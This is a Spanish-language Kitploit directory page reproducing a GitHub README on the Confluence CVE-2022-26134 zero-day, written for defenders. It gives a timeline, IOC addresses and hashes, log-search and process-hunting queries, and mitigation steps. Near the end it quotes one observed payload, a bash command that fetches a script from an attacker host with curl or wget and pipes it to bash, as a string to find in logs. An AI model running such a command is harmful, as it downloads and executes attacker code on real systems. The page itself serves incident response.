Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/archanchoudhury/confluence-cve-2022-26134
Gestión de Indicadores de Compromiso (IOC)Análisis de VulnerabilidadesExplotaciónAnálisis ForenseSeguridad WebInteligencia de AmenazasDetección de IntrusionesAprendizaje y EducaciónRespuesta a Incidentes

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubarchanchoudhury/confluence-cve-2022-26134

Confluence-CVE-2022-26134

Este repositorio habla sobre la explotación de día cero de Atlassian Confluence, su defensa y punto de vista de análisis desde la perspectiva de SecOps o Blue Team

Ver Repositorio
4hace 4 añosAún no revisado

Confluence-CVE-2022-26134

Este repositorio habla sobre la explotación de día cero de Atlassian Confluence, desde el punto de vista de defensa y análisis de un equipo de SecOps o Blue Team.

Índice

  • Acerca de
  • Cronología
  • Comprendiendo el Exploit
  • Lista de IOCs
  • Estrategia de Detección
  • Planes de Mitigación
  • Referencias

Acerca de

Durante el fin de semana del Día de los Caídos en Estados Unidos, Volexity realizó una investigación de respuesta a incidentes que involucraba dos servidores web con acceso a Internet pertenecientes a uno de sus clientes, que ejecutaban el software Atlassian Confluence Server. La investigación comenzó después de que se detectara actividad sospechosa en los hosts, que incluía la escritura de webshells JSP en el disco. Volexity utilizó inmediatamente Volexity Surge Collect Pro para recolectar la memoria del sistema y los archivos clave de los sistemas Confluence Server para su análisis. Tras una revisión exhaustiva de los datos recopilados, Volexity pudo determinar que el compromiso del servidor se debía a que un atacante lanzó un exploit para lograr la ejecución remota de código. Posteriormente, Volexity pudo recrear ese exploit e identificar una vulnerabilidad de día cero que afecta a versiones completamente actualizadas de Confluence Server.

Tras el descubrimiento y verificación de esta vulnerabilidad, Volexity se puso en contacto con Atlassian para informar los detalles relevantes el 31 de mayo de 2022. Atlassian ha confirmado la vulnerabilidad y posteriormente asignó el problema a CVE-2022-26134. Se ha confirmado que funciona en las versiones actuales de Confluence Server y Data Center.

Cronología

  • Un aviso fechado el 2 de junio, 1300 PT (2000 UTC), no describe la naturaleza de la falla y revela que se ha detectado "explotación activa actual". No hay parche disponible.
  • Volexity descubre un día cero en Confluence el 03/06/2022 (GMT)
  • El 03/06/2022 (GMT) Atlassian
    • Aclaró las versiones afectadas
    • Añadió una regla WAF
    • Añadió un marco de tiempo estimado para que las correcciones estén disponibles
  • El 03/06/2022 hemos visto intentos de explotación activa y POCs siendo publicados por todo Internet.
  • El 03 Jun 2022 8 AM PDT (Hora del Pacífico, -7 horas) Atlassian publicó información de mitigación que incluye archivos jar y de clase de reemplazo
  • El 03 Jun 2022 10 AM PDT (Hora del Pacífico, -7 horas) Atlassian actualizó con las versiones corregidas y eliminó el consejo provisional sobre agregar una regla WAF.
  • El 03 Jun 2022 4 PM PDT (Hora del Pacífico, -7 horas) Atlassian actualizó para aclarar la limitación con las actualizaciones progresivas.

Consulte los detalles técnicos AQUÍ

Comprendiendo el Exploit

  • Puede consultar el blog de Volexity AQUÍ para entender los detalles completos del principio de funcionamiento de este exploit y los detalles del análisis.
  • Vea este VIDEO para comprender el exploit y su remediación.

Lista de IOCs

  • Dado que se trata de una vulnerabilidad de día cero y se puede explotar muy fácilmente, no existe una lista exclusiva de IOCs. Según la investigación de la comunidad, se observó que los atacantes intentaron desplegar XMRIG, KINSING, MIRAI, etc., después de la explotación.
  • La cadena del exploit "parece" contener esta cadena ${ Este patrón no está codificado en URL y no es SEGURO para URL, por lo que aparecería como: $%7B en los registros.
  • El blog de Volexity hace referencia al archivo de Confluence: noop.jsp
  • Presencia de un webshell con extensión .jsp sin detalles de ruta. Por ejemplo ESTE
  • Algunas direcciones IP-
root@kitploit:~
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
  • Hashes de archivo para noop.jsp malicioso
root@kitploit:~
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
  • Se ha observado una explotación generalizada de Atlassian Confluence CVE-2022-26134, específicamente que está confirmada como funcional, el 4 de junio de 2022. Encuentre las IPs únicas AQUÍ

Estrategia de Detección

  • Si tiene un Confluence Server y Data Center con acceso a Internet que no está parcheado, es prudente interpretarlo como Comprometido
  • Busque archivos NUEVOS en la ruta de Confluence en el disco que tengan extensión .jsp o cualquier otra.
  • Busque procesos hijo sospechosos de los registros de tomcat
root@kitploit:~
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
  • Busque la cadena ${ en (directorio de instalación)/logs/*.log
  • En los registros de acceso, intente egrep -a -i -f pattern.txt *.log donde pattern.txt debe guardarse como ${ o simplemente intente grep "\${" ruta del archivo de log o intente grep "$%7B" ruta del archivo de log
  • Puede haber solicitudes web entrantes para noop.js, así que puede intentar findstr -i noop.jsp "logpath"
  • Puede tener diferentes directorios de instalación, así que intente encontrar $jspname_jsp.java en el directorio confluence_install_dir/work/Standalone/. Por ejemplo, si encuentra un shell llamado hack.jsp debería ver hack_jsp.java Si no encuentra hack.jsp ya no en el disco, intente pivotar en los registros web para buscar acceso al mismo. Esto dará la importancia de cuándo se accedió/eliminó.
root@kitploit:~
./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp

así que busque archivos creados recientemente que no estén en la lista anterior.

  • Verifique los archivos en el disco que no están en la lista y en los registros de acceso con respuestas 200. Además, verifique si alguno de estos archivos ha sido modificado. En particular, noop.jsp es popular y generalmente tiene alrededor de 103 bytes.
  • Si ha identificado que el archivo noop.jsp ha sido alertado, aproveche este SCRIPT para identificar si es sospechoso.
  • Puede usar este SCRIPT para ejecutar un escaneo rápido en sus registros y ver posibles actores de amenazas. NOTA- La lista de IP debe verificarse antes de usar esto, además la lista no es exclusiva.
  • Examine múltiples casos para buscar archivos .java en el directorio ./confluence/org/apache/jsp/ que no deberían estar allí.
  • Busque el árbol de procesos y la ejecución de procesos en cualquier host donde haya identificado un intento de exploit. Debe buscar un árbol de procesos como: java->bash->python->bash
  • Un proceso bash, generado por uno de python, cuyo padre era otro bash y luego el nombre del proceso raíz java. Este tipo de ejecución debe ser identificada.

Planes de Mitigación

  • A partir de la primera confirmación de este repositorio, Atlassian ha lanzado una versión parcheada de Confluence Server y Data Center desde AQUÍ
  • Si no puede actualizar Confluence inmediatamente, entonces, como solución temporal, puede mitigar el problema CVE-2022-26134 actualizando los siguientes archivos como se describe AQUÍ
  • Como paso inmediato, por favor cree un plan de respuesta a incidentes para identificar sus instancias expuestas a Internet y realice la detección. Y ponga el servidor bajo listas blancas de IP o bajo VPN para reducir la superficie de riesgo.

Referencias

  • https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
  • https://www.theregister.com/2022/06/03/atlassian_confluence_critical_flaw_attacked/
  • https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
  • https://www.shodan.io/search?query=x-confluence
  • https://www.shodan.io/search?query=http.favicon.hash%3A-305179312
  • https://www.pwndefend.com/2022/06/03/cve-2022-26134-confluence-zero-day-rce/
  • https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
  • https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis?referrer=notificationEmail
  • https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/
Descargar herramienta
  • Consulta EQL process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' puede ayudar a identificar como lo describió David AQUÍ
  • Busque este payload común bash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash en los registros web
  • Se puede encontrar una firma de Suricata AQUÍ
  • La configuración de cada uno puede ser diferente, pero Confluence generalmente solo tiene estos archivos JSP: